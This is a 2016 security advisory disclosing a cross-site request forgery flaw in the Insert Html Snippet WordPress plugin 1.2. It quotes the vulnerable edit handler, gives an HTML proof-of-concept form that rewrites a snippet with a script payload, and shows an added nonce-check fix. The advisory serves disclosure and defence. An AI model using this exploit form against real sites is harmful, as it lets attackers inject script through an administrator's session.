------------------------------------------------------------------------
Cross-Site Request Forgery in Insert Html Snippet WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0027

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the Insert Html Snippet WordPress Plugin is
vulnerable to Cross-Site Request Forgery. Amongst others, this issue can
be used to update an existing HTML snippet. This can be used to insert
arbitrary HTML and scripting code within a post or page that uses the
snippet. In order to exploit this issue, the attacker has to lure/force
a logged-on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Insert Html Snippet WordPress
Plugin version 1.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been addressed in Insert Html Snippet version 1.2.1.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_insert_html_snippet_wordpress_plugin.html

This issue exists because Insert Html Snippet lacks protection against Cross-Site Request Forgery attacks. See, for example, the code that is used to edit a snippet:

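// Vulnerable: the update is processed as soon as 'updateSubmit' is present;
// no anti-CSRF token (nonce) is verified before the snippet is changed.
if(isset($_POST) && isset($_POST['updateSubmit'])){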
   
//       echo '<pre>';
//       print_r($_POST);
//       die("JJJ");
   $_POST = stripslashes_deep($_POST);
   $_POST = xyz_trim_deep($_POST);
   
   $xyz_ihs_snippetId = $_GET['snippetId'];
   
   $temp_xyz_ihs_title = str_replace(' ', '', $_POST['snippetTitle']);
   $temp_xyz_ihs_title = str_replace('-', '', $temp_xyz_ihs_title);
   
   $xyz_ihs_title = str_replace(' ', '-', $_POST['snippetTitle']);
   $xyz_ihs_content = $_POST['snippetContent'];
   
   if($xyz_ihs_title != "" && $xyz_ihs_content != ""){
   
      if(ctype_alnum($temp_xyz_ihs_title))
      {
      $snippet_count = $wpdb->query($wpdb->prepare( 'SELECT * FROM '.$wpdb->prefix.'xyz_ihs_short_code WHERE id!=%d AND title=%s LIMIT 0,1',$xyz_ihs_snippetId,$xyz_ihs_title)) ;
   
      if($snippet_count == 0){
         $xyz_shortCode = '[xyz-ihs snippet="'.$xyz_ihs_title.'"]';
   
         $wpdb->update($wpdb->prefix.'xyz_ihs_short_code', array('title'=>$xyz_ihs_title,'content'=>$xyz_ihs_content,'short_code'=>$xyz_shortCode,), array('id'=>$xyz_ihs_snippetId));

In order to exploit this issue, the attacker has to lure/force a logged-on WordPress Administrator into opening a malicious website.

Proof of concept

<html>
   <body>
      <form action="http://<target>/wp-admin/admin.php?page=insert-html-snippet-manage&action=snippet-edit&snippetId=1&pageno=1" method="POST">
         <input type="hidden" name="snippetId" value="1" />
         <input type="hidden" name="snippetTitle" value="Fu" />
         <input type="hidden" name="snippetContent" value="<script>alert(1);</script>" />
         <input type="hidden" name="updateSubmit" value="Update" />
         <input type="submit" value="Submit request" />
      </form>
   </body>
</html>
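
The edit handler acts on any POST that carries updateSubmit, which is why a form hosted on another site is accepted. The following is an added example of the standard WordPress nonce check for such a handler; it is not the plugin's code and not the actual 1.2.1 change. The function names, the nonce action and field name are hypothetical, and the 'manage_options' capability is an assumption about who may edit snippets.

```php
<?php
// Added illustration: not the plugin's code and not the 1.2.1 patch.
// Assumes it is loaded inside wp-admin, where WordPress core functions exist.

// Hypothetical field name for the hidden nonce input.
const IHS_EXAMPLE_NONCE_FIELD = '_ihs_example_nonce';

// Hypothetical nonce action. Binding it to the snippet id means a token
// issued for one snippet is not valid for editing another.
function ihs_example_nonce_action($snippet_id) {
    return 'ihs-example-edit-snippet_' . (int) $snippet_id;
}

// Step 1: call inside the <form> when rendering the snippet edit page.
// wp_nonce_field() prints a hidden input tied to the current user/session.
function ihs_example_render_nonce($snippet_id) {
    wp_nonce_field(ihs_example_nonce_action($snippet_id), IHS_EXAMPLE_NONCE_FIELD);
}

// Step 2: call at the top of the POST handler, before any $_POST value is
// used or the database is touched. Returns the validated snippet id, or
// null when the request is not an update submission.
function ihs_example_guard_update() {
    if (!isset($_POST['updateSubmit'])) {
        return null;
    }

    // Assumption: only administrators may edit snippets.
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions.', '', array('response' => 403));
    }

    $snippet_id = isset($_GET['snippetId']) ? absint($_GET['snippetId']) : 0;

    // Stops the request with a 403 page when the nonce is missing or invalid,
    // which is the case for a form submitted from another origin.
    check_admin_referer(ihs_example_nonce_action($snippet_id), IHS_EXAMPLE_NONCE_FIELD);

    return $snippet_id;
}

// In the handler:
//   $xyz_ihs_snippetId = ihs_example_guard_update();
//   if ($xyz_ihs_snippetId !== null) { /* existing update logic */ }
```

With this guard in place, a cross-site form submission like the proof of concept is rejected before the update query runs, because the submitting page cannot read the administrator's nonce.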


------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.